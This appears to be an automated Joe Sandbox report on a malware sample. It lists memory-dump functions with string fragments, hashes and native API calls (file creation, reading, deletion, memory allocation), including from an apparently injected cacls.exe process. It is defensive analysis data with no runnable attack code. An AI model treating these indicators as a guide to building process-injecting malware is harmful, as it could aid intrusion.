Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: :$:$:$A$I$N$P$m$s$t
API String ID: 0-2304485323
Opcode ID: 3eb45f6780be8e3838cfaaa1969efed26f9d64cf360ad394e1ec97014d6bf958
Instruction ID: 9019580e64dde74a0f1052f5de7dfec490e09cb749973f2a34f58ac527a41561
Opcode Fuzzy Hash: 3eb45f6780be8e3838cfaaa1969efed26f9d64cf360ad394e1ec97014d6bf958
Instruction Fuzzy Hash: 1DD1E7B9910704AFDB50DBE5CC85BEEB3B9AF49304F04451DE205EB240EBB8A945CBB5

Function 037EF9BB Relevance: 10.1, Strings: 8, Instructions: 135COMMON

Download Yara Rule

Strings

., xrefs: 037EF9F2
P, xrefs: 037EFAA9
i, xrefs: 037EFACE
o, xrefs: 037EFAB3
e, xrefs: 037EFAD5
x, xrefs: 037EF9F9
r, xrefs: 037EFABD
m, xrefs: 037EFAC7

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: .$P$e$i$m$o$r$x
API String ID: 0-620024284
Opcode ID: 7042634275b9cebbbef233e0962274967cf35179241453019f72b5c1362a000c
Instruction ID: 83ec30944e3983236fb371a1cacf22be56716a239798e4a18a012ac0b5457fbb
Opcode Fuzzy Hash: 7042634275b9cebbbef233e0962274967cf35179241453019f72b5c1362a000c
Instruction Fuzzy Hash: C041B7B9810318B7DB21EBE5DC45FDE737CAF55300F0085D9A609AB181EAB557488FB1

Function 037EF9C0 Relevance: 10.1, Strings: 8, Instructions: 131COMMON

Download Yara Rule

Strings

., xrefs: 037EF9F2
P, xrefs: 037EFAA9
i, xrefs: 037EFACE
o, xrefs: 037EFAB3
e, xrefs: 037EFAD5
x, xrefs: 037EF9F9
r, xrefs: 037EFABD
m, xrefs: 037EFAC7

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: .$P$e$i$m$o$r$x
API String ID: 0-620024284
Opcode ID: ac9029fc9f18ebc2d648313c7577978b59fb73e3a45bfeaa51966bad760464c4
Instruction ID: a13dfe71265d0c4620ddaa63cd5197753ed49d4f912120ecc49a6b5c87610abd
Opcode Fuzzy Hash: ac9029fc9f18ebc2d648313c7577978b59fb73e3a45bfeaa51966bad760464c4
Instruction Fuzzy Hash: 9E41A7BA810318B6DB21EBE5DC44FDE737CAF55304F0085D9A609AB181EAB557488FB1

Function 037FCA80 Relevance: 8.9, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

c, xrefs: 037FCAF0
S, xrefs: 037FCAFE
e, xrefs: 037FCB0C
\, xrefs: 037FCB45
a, xrefs: 037FCB05
L, xrefs: 037FCAE9
l, xrefs: 037FCAF7

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: L$S$\$a$c$e$l
API String ID: 0-3322591375
Opcode ID: 265adf54b797553167819559391f658a5b33ce90f3c8baeeb151dd2fe02b6cae
Instruction ID: 437c04a88649b9c70c291c9d909d42703e22e56802c2a6e2d9b106d3099ae0cc
Opcode Fuzzy Hash: 265adf54b797553167819559391f658a5b33ce90f3c8baeeb151dd2fe02b6cae
Instruction Fuzzy Hash: DB41A6B6C40218AECB10DFD9DC44BEEF7B8BF88304F054199DA09AB241E77155458FA5

Function 037F4620 Relevance: 7.7, Strings: 6, Instructions: 171COMMON

Download Yara Rule

Strings

T, xrefs: 037F465D
P, xrefs: 037F4656
r, xrefs: 037F4679
x, xrefs: 037F4687
F, xrefs: 037F4672
f, xrefs: 037F4680

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: F$P$T$f$r$x
API String ID: 0-2523166886
Opcode ID: 9ed1027d76c50a3eba8623974a624a40b0ccb17d56f3f0c72968ae0005ccbe02
Instruction ID: c02d3ada949c93220e01086569e61437223c7c49ef13a1fabe31567e6c4a52b2
Opcode Fuzzy Hash: 9ed1027d76c50a3eba8623974a624a40b0ccb17d56f3f0c72968ae0005ccbe02
Instruction Fuzzy Hash: 17519171900354AFD735DBAADC48BABB3B8BF44704F04455DA609AB290D7B4A644CBA2

Function 037F4612 Relevance: 7.5, Strings: 6, Instructions: 45COMMON

Download Yara Rule

Strings

T, xrefs: 037F465D
P, xrefs: 037F4656
r, xrefs: 037F4679
x, xrefs: 037F4687
F, xrefs: 037F4672
f, xrefs: 037F4680

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: F$P$T$f$r$x
API String ID: 0-2523166886
Opcode ID: 970e6cb2375f0d37ef8a694351038b26b6b2d1462d2b8e647155386e2593525d
Instruction ID: 110329e66e7b290e9beae3dde7952cdb98189310209c2d36798c1b92c2f83e9d
Opcode Fuzzy Hash: 970e6cb2375f0d37ef8a694351038b26b6b2d1462d2b8e647155386e2593525d
Instruction Fuzzy Hash: 30018C71D10318ABDB20DFA998056EEBBB5FF41314F00815AE918AF240E7B64A098BD2

Function 037DD399 Relevance: 7.5, Strings: 6, Instructions: 40COMMON

Download Yara Rule

Strings

YS^K, xrefs: 037DD3BB
?, xrefs: 037DD3C5
XEVO, xrefs: 037DD3AD
en-U, xrefs: 037DD380
S, xrefs: 037DD387
YS^K, xrefs: 037DD3D0, 037DD3D9

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: ?$S$XEVO$YS^K$YS^K$en-U
API String ID: 0-217018268
Opcode ID: 9f9afdff26fd525ccb1303910ae9ef16c5bb5b2f46e53e9a0c61b9663f4fbe9b
Instruction ID: 536e9336834b007703d3bc2d877ee33a6639185212b07dc3b1339b7bd4bf4902
Opcode Fuzzy Hash: 9f9afdff26fd525ccb1303910ae9ef16c5bb5b2f46e53e9a0c61b9663f4fbe9b
Instruction Fuzzy Hash: 31F0F475D0424CBADB04CFE8A800ABEFBB8EB04604F0586E9D818DB241D7708714CB92

Function 037F3D20 Relevance: 6.4, Strings: 5, Instructions: 200COMMON

Download Yara Rule

Strings

o, xrefs: 037F3D64
i, xrefs: 037F3D6B
l, xrefs: 037F3D72
, xrefs: 037F3D56
u, xrefs: 037F3D5D

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: $i$l$o$u
API String ID: 0-2051669658
Opcode ID: 03209835019824af21c54b15511e18d4af92cbc13d9fadb7debcac5bb9c31f6a
Instruction ID: e7554f069cd0627160158cdd8a6be3db2d82b4d16ad8d420ccde1aeb5e24c011
Opcode Fuzzy Hash: 03209835019824af21c54b15511e18d4af92cbc13d9fadb7debcac5bb9c31f6a
Instruction Fuzzy Hash: 50613EB5900304AFDB24DBA4CC84FEFB7FCAF88714F144559E619AB240E674AA45CB60

Function 037F3D1A Relevance: 6.4, Strings: 5, Instructions: 126COMMON

Download Yara Rule

Strings

o, xrefs: 037F3D64
i, xrefs: 037F3D6B
l, xrefs: 037F3D72
, xrefs: 037F3D56
u, xrefs: 037F3D5D

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: $i$l$o$u
API String ID: 0-2051669658
Opcode ID: 2b17c4a5f3d2807986b2f720ba963eb00e001ab16b4d82a6466cfe8369ce5878
Instruction ID: 5fc07efe3973f0d7b03152a6c55a6d4ebf2ba016b0cfe50118f84ea9688bac13
Opcode Fuzzy Hash: 2b17c4a5f3d2807986b2f720ba963eb00e001ab16b4d82a6466cfe8369ce5878
Instruction Fuzzy Hash: 8B410EB5900309AFDB10DFA4CC84FEFBBF9AF88704F104559E659AB240E774AA45CB60

Function 037F39B0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON

Download Yara Rule

Strings

e, xrefs: 037F39F4
, xrefs: 037F39DF
o, xrefs: 037F39E6
k, xrefs: 037F39ED

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: $e$k$o
API String ID: 0-3624523832
Opcode ID: 5a902d471e99dfce83ee7e4d90af746ead74a1218b6aab4f70200460430b6d27
Instruction ID: f48fb0f6b479c976d225cad0ad141927a7e61b9eb3356e52b0ed32483255a496
Opcode Fuzzy Hash: 5a902d471e99dfce83ee7e4d90af746ead74a1218b6aab4f70200460430b6d27
Instruction Fuzzy Hash: 40B1EBB5A00704AFDB24DBA8CC85FEFB7FDAF88700F148558F619A7244D675AA41CB60

Function 037F42F0 Relevance: 5.2, Strings: 4, Instructions: 236COMMON

Download Yara Rule

Strings

e, xrefs: 037F43D4
o, xrefs: 037F43CD
, xrefs: 037F43BF
h, xrefs: 037F43C6

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: $e$h$o
API String ID: 0-3662636641
Opcode ID: 4b10b30595d6933fb4ad6e6be9f9041d3f3b0abf2e4d92824dd996ab2b577e5f
Instruction ID: 986d804b038d0487e010a5a7e1f709cde771a1607247b62bd1a163e29b3516a2
Opcode Fuzzy Hash: 4b10b30595d6933fb4ad6e6be9f9041d3f3b0abf2e4d92824dd996ab2b577e5f
Instruction Fuzzy Hash: E58192BA8503186ADB21EB95DC85FEF737DEF48300F0085D9E609AB140EB746B458FA5

Function 037F39AD Relevance: 5.2, Strings: 4, Instructions: 180COMMON

Download Yara Rule

Strings

e, xrefs: 037F39F4
, xrefs: 037F39DF
o, xrefs: 037F39E6
k, xrefs: 037F39ED

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: $e$k$o
API String ID: 0-3624523832
Opcode ID: ee0d32fbf39e741a68f2bde3af33e5afd2f08cb5f2a2f7bee9c5935a9a0c2d7e
Instruction ID: 1f7b18f1be84cd2c8227369b6e1df00777b2bfc5b60c6ffa1c5c5fc07e1d68fc
Opcode Fuzzy Hash: ee0d32fbf39e741a68f2bde3af33e5afd2f08cb5f2a2f7bee9c5935a9a0c2d7e
Instruction Fuzzy Hash: 6F613FB5A00308AFDB64DFA4CC94FEFB7BDAF88700F148559E6199B244D771AA41CB60

Function 037F3870 Relevance: 5.1, Strings: 4, Instructions: 122COMMON

Download Yara Rule

Strings

TRUE, xrefs: 037F396D
FALSETRUE, xrefs: 037F3918, 037F391B
TRUE, xrefs: 037F38DA, 037F38DD
FALSETRUE, xrefs: 037F38F0, 037F38F5

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
API String ID: 0-2877786613
Opcode ID: 8a69b634c522bd0ca19bbd01e38bb3fc5f6487f5ba91524cee12be61d51b5354
Instruction ID: 39eac6c1c8f19ce67b076971884eb11b54899b4d47cbbe3fefc77d25e9f86857
Opcode Fuzzy Hash: 8a69b634c522bd0ca19bbd01e38bb3fc5f6487f5ba91524cee12be61d51b5354
Instruction Fuzzy Hash: 05412A759912587FEB11EBD99C41FFF777CEF45604F004088FA04AB285EB746A018BA6

Function 037F386D Relevance: 5.1, Strings: 4, Instructions: 122COMMON

Download Yara Rule

Strings

TRUE, xrefs: 037F396D
FALSETRUE, xrefs: 037F3918, 037F391B
TRUE, xrefs: 037F38DA, 037F38DD
FALSETRUE, xrefs: 037F38F0, 037F38F5

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
API String ID: 0-2877786613
Opcode ID: 51d039127a515f0d91da91d7fd7091eaf456ee8765a567eb0d73bef9c20bfa3d
Instruction ID: fc0f05d6c0910cb1d2e406cc8c6450e57feb684ed611501825b9fc582d5cc8c2
Opcode Fuzzy Hash: 51d039127a515f0d91da91d7fd7091eaf456ee8765a567eb0d73bef9c20bfa3d
Instruction Fuzzy Hash: 93313B759912587FEB11EBD99C41FFF777CEF45604F004088FA04AB281EB746A018BA6

Function 037F0F43 Relevance: 5.1, Strings: 4, Instructions: 118COMMON

Download Yara Rule

Strings

, xrefs: 037F0FE7
e, xrefs: 037F0FFC
k, xrefs: 037F0FF5
o, xrefs: 037F0FEE

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: $e$k$o
API String ID: 0-3624523832
Opcode ID: 97207b6e483bd5a079752567e284ac392004a6ccec80929459e459d016f8ca4b
Instruction ID: 7eba064cc65af58b379a7184f062f29fb3c8d324a1f08904baf0d1771e420ca3
Opcode Fuzzy Hash: 97207b6e483bd5a079752567e284ac392004a6ccec80929459e459d016f8ca4b
Instruction Fuzzy Hash: 97315A7A904258DFCB10CF98E885ADAFBB9FF44224F088299DD15AB303D331D446CBA0

Function 037F42E8 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

e, xrefs: 037F43D4
o, xrefs: 037F43CD
, xrefs: 037F43BF
h, xrefs: 037F43C6

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: $e$h$o
API String ID: 0-3662636641
Opcode ID: 7fcf65ae885c4f32b2405574978c4246d1080fea2036aa680647d73bf3840b18
Instruction ID: 3a913a80ae11469cbea98639ae31f3533d0281e2be4cca30d1fd93f75e1b163d
Opcode Fuzzy Hash: 7fcf65ae885c4f32b2405574978c4246d1080fea2036aa680647d73bf3840b18
Instruction Fuzzy Hash: 1841C7B5C503586ADB51EBA5DC45FDEB3BDEF48300F0085D9E608AB140EB746B448FA6

Function 037EFBA0 Relevance: 5.1, Strings: 4, Instructions: 89COMMON

Download Yara Rule

Strings

T, xrefs: 037EFC6C
K, xrefs: 037EFC7A
3, xrefs: 037EFC73
n, xrefs: 037EFC65

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: 3$K$T$n
API String ID: 0-2835242293
Opcode ID: b4352191150edb5925622738f077d5c9cdbb3efc545db54d4626fc246929e6d8
Instruction ID: f6045e5f5003e060d000cece93b87e17c73851eabceb3e4e210985ce8978c041
Opcode Fuzzy Hash: b4352191150edb5925622738f077d5c9cdbb3efc545db54d4626fc246929e6d8
Instruction Fuzzy Hash: E03137B5910219BBDB10DFD8DC45BFE77B8EF08304F004198E904EB280E7B59A058BE5

Function 037F0FBB Relevance: 5.0, Strings: 4, Instructions: 50COMMON

Download Yara Rule

Strings

, xrefs: 037F0FE7
e, xrefs: 037F0FFC
k, xrefs: 037F0FF5
o, xrefs: 037F0FEE

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: $e$k$o
API String ID: 0-3624523832
Opcode ID: 6b3a1119e78faeda6a1fb4d7be7455efd03a7a68ff6b19726d63dc0f4b817512
Instruction ID: 1309306e52dd14c97cab6c445fc07f431643f4a41d546a8288e7888f4fbf8731
Opcode Fuzzy Hash: 6b3a1119e78faeda6a1fb4d7be7455efd03a7a68ff6b19726d63dc0f4b817512
Instruction Fuzzy Hash: A31182B2900218AFDB14DF99DC84ADEBBB9FF48314F048259E915AF205D772D545CFA0

Function 037F0FC0 Relevance: 5.0, Strings: 4, Instructions: 47COMMON

Download Yara Rule

Strings

, xrefs: 037F0FE7
e, xrefs: 037F0FFC
k, xrefs: 037F0FF5
o, xrefs: 037F0FEE

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: $e$k$o
API String ID: 0-3624523832
Opcode ID: 448dfec1e86be9c4a04894b007a236068fd0b8b423a877edac264a639e6a84d8
Instruction ID: d76800a9970eb9e7b4a378ff76a3eb0e78a7ef3580e805bddfd463306e7986a8
Opcode Fuzzy Hash: 448dfec1e86be9c4a04894b007a236068fd0b8b423a877edac264a639e6a84d8
Instruction Fuzzy Hash: 7A01A1B2900318ABDB14DF99DC84ADEB7B9FF08314F048259EA15AF241E7719944CBA0

Function 037E0EF0 Relevance: 5.0, Strings: 4, Instructions: 43COMMON

Download Yara Rule

Strings

6, xrefs: 037E0F06
RZ?, xrefs: 037E0F66
^, xrefs: 037E0F1E
{, xrefs: 037E0F16

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: 6$RZ?$^${
API String ID: 0-966442152
Opcode ID: b39f54d6213f52b17407d31b09590a804f1e79118c7e2cac707d2c186cd1b3e2
Instruction ID: f69809e2049f0862cab2c1b624b2cd7789eb21addfb8b3415279e4dc28b4d968
Opcode Fuzzy Hash: b39f54d6213f52b17407d31b09590a804f1e79118c7e2cac707d2c186cd1b3e2
Instruction Fuzzy Hash: DD11DE10D087CAD9DB22C7BD88546AEBF715F13224F0883D9E4F56B2D2C2754716C7A6

Function 037DD3A0 Relevance: 5.0, Strings: 4, Instructions: 24COMMON

Download Yara Rule

Strings

YS^K, xrefs: 037DD3BB
?, xrefs: 037DD3C5
XEVO, xrefs: 037DD3AD
YS^K, xrefs: 037DD3D0, 037DD3D9

Memory Dump Source

Source File: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3690000_fXZvHKoWCzop.jbxd

Yara matches

Similarity

API ID:
String ID: ?$XEVO$YS^K$YS^K
API String ID: 0-3487936135
Opcode ID: 52f9616eb148a31fc9e03c74992ad14f4d95ef24d562a930aac48bf63b7d8bff
Instruction ID: 5d2a82d0a198e4ac792dc7302998a3729316a483ff5f9dff82514182bd75ed8f
Opcode Fuzzy Hash: 52f9616eb148a31fc9e03c74992ad14f4d95ef24d562a930aac48bf63b7d8bff
Instruction Fuzzy Hash: C6E09274D0528CAADB04DFFDA8006AEBBB8AB05100F1549AAD868DB242D3748614CBA2

Analysis Process: cacls.exePID: 5900, Parent PID: 5948COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	3.9%
Signature Coverage:	2.1%
Total number of Nodes:	483
Total number of Limit Nodes:	75

Executed Functions

Function 02D99BD0 Relevance: 39.2, Strings: 31, Instructions: 452
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,, xrefs: 02D99F1B
Vn, xrefs: 02D9A102
., xrefs: 02D99CF5
0, xrefs: 02D99C12
r, xrefs: 02D99E2C
*, xrefs: 02D99BEA
k, xrefs: 02D99C9E
TqQ,, xrefs: 02D9A2FD
b5, xrefs: 02D99EA6
+z, xrefs: 02D99EBB
)n, xrefs: 02D99D4D
H3, xrefs: 02D99CD7
], xrefs: 02D99F11
=, xrefs: 02D99BF4
Q,, xrefs: 02D99ED0
t, xrefs: 02D99EC9
O, xrefs: 02D99C58
V7, xrefs: 02D99CEB
], xrefs: 02D99EDE
J, xrefs: 02D99F2F
#, xrefs: 02D99E0E
Vn, xrefs: 02D99E71
r, xrefs: 02D99E22
~, xrefs: 02D9A0EC
Qt, xrefs: 02D9A380
b, xrefs: 02D99C6C
", xrefs: 02D99C76
z, xrefs: 02D99F43
PQ, xrefs: 02D99D46
s, xrefs: 02D99F39
Tq, xrefs: 02D9A2D9

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID:
String ID: "$#$)n$*$+z$,$.$0$=$H3$J$O$PQ$Q,$Tq$TqQ,$V7$Vn$Vn$]$b$b5$k$r$r$s$z$~$Qt$]$t
API String ID: 0-3854997943
Opcode ID: 2effc195b0e4496bf460b230c784323759817f3c08ca0e71f855bac658b65c2e
Instruction ID: 22f0f4283c6fb3b1634eb0471a55e4fd4cdc85ec2e81fce08e2b58490c84dc23
Opcode Fuzzy Hash: 2effc195b0e4496bf460b230c784323759817f3c08ca0e71f855bac658b65c2e
Instruction Fuzzy Hash: B1329CB0905229CBEF24CF48C9987DDBBB2BB49308F1081D9D5896B394C7B95E88CF55

Function 02DAC4D0 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 02DAC5AF
FindNextFileW.KERNELBASE(?,00000010), ref: 02DAC5EE
FindClose.KERNELBASE(?), ref: 02DAC5F9

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 3c212e71f2402b8eea7c9327ee31dd1cc5755a352334367785f0eebe5570a261
Instruction ID: 63e4522ca4abb33cf5dca547ca04ed24053213084c37b14c0454ccadea5b7fe5
Opcode Fuzzy Hash: 3c212e71f2402b8eea7c9327ee31dd1cc5755a352334367785f0eebe5570a261
Instruction Fuzzy Hash: BE318C71900249BBDB20DBA0CC95FFF73BDEF45718F144459B909A7280EA70AE858BA0

Function 02DB8F20 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02DB901B

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b6596887915ae8438a6d81fb7a29118ca1743f1d1282039227df242f9211f1e7
Instruction ID: 59c86002d5ace256c4c365fb444831b37a32189a9ebb060972484fa652498202
Opcode Fuzzy Hash: b6596887915ae8438a6d81fb7a29118ca1743f1d1282039227df242f9211f1e7
Instruction Fuzzy Hash: EA31F7B5A01248AFDB14DF98C881EEEB7B9EF88310F108209FD09A7340D770A945CBA1

Function 02DB9090 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,?,?), ref: 02DB9176

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 4270237eea987af677f9ae2262cbedf2618969ffc91b8dbfaa850e36cc397ea1
Instruction ID: d0c1dc80347540a36aaa2d8f646849cd88958255ef45fd18e84db89f10583a86
Opcode Fuzzy Hash: 4270237eea987af677f9ae2262cbedf2618969ffc91b8dbfaa850e36cc397ea1
Instruction Fuzzy Hash: 1031D475A00648AFDB14DF98D845EEFBBB9EF88314F004209FD19A7340D770A951CBA1

Function 02DB9390 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(?,00000004,?,00000004,00003000,?,?,?,?,?,02DB7E4F,02DA1CDE), ref: 02DB9458

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 9a7d96741eeb4f21f81d5a2bf1eb8eb814a2806a23147964de8ea8707ab653f9
Instruction ID: 325afd95b3b46e8a026f7f37be22b15f6b4e4ba2a78155c823a2ef9c51968892
Opcode Fuzzy Hash: 9a7d96741eeb4f21f81d5a2bf1eb8eb814a2806a23147964de8ea8707ab653f9
Instruction Fuzzy Hash: 7021F3B5A00249ABDB10DF98DC45FEFB7B9EF89704F00410AF909AB340E674A955CBA1

Function 02DB9180 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 02DB9213

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 68323791449ae5693b3724597f4f4a8fb7dfc11e481aed14749f8b11567e3935
Instruction ID: 65c145dadd2f3fa33bc25f0a30e27779eb1f4e60b7a286c7a87e923a0e3fa21e
Opcode Fuzzy Hash: 68323791449ae5693b3724597f4f4a8fb7dfc11e481aed14749f8b11567e3935
Instruction Fuzzy Hash: FF115171600248BEE711EA58CC45FEFB76DEF89714F004109F90DA7280E7706A45CBB5

Function 02DB9220 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02DB9257

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: d089ca08fd3c1a55d86609b97c9bfde2ba335218f51f499a1dce21e598f21b78
Instruction ID: 7e21ead5b1e04788cfbf21893f0b72c747ea8ac06a296d03ea1b150b06eb2436
Opcode Fuzzy Hash: d089ca08fd3c1a55d86609b97c9bfde2ba335218f51f499a1dce21e598f21b78
Instruction Fuzzy Hash: 34E08C32200214BBC620EB69DC00FDB77ADEFCA764F408019FA0DAB241C674B9158BF0

Function 03744340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0374434A

Memory Dump Source

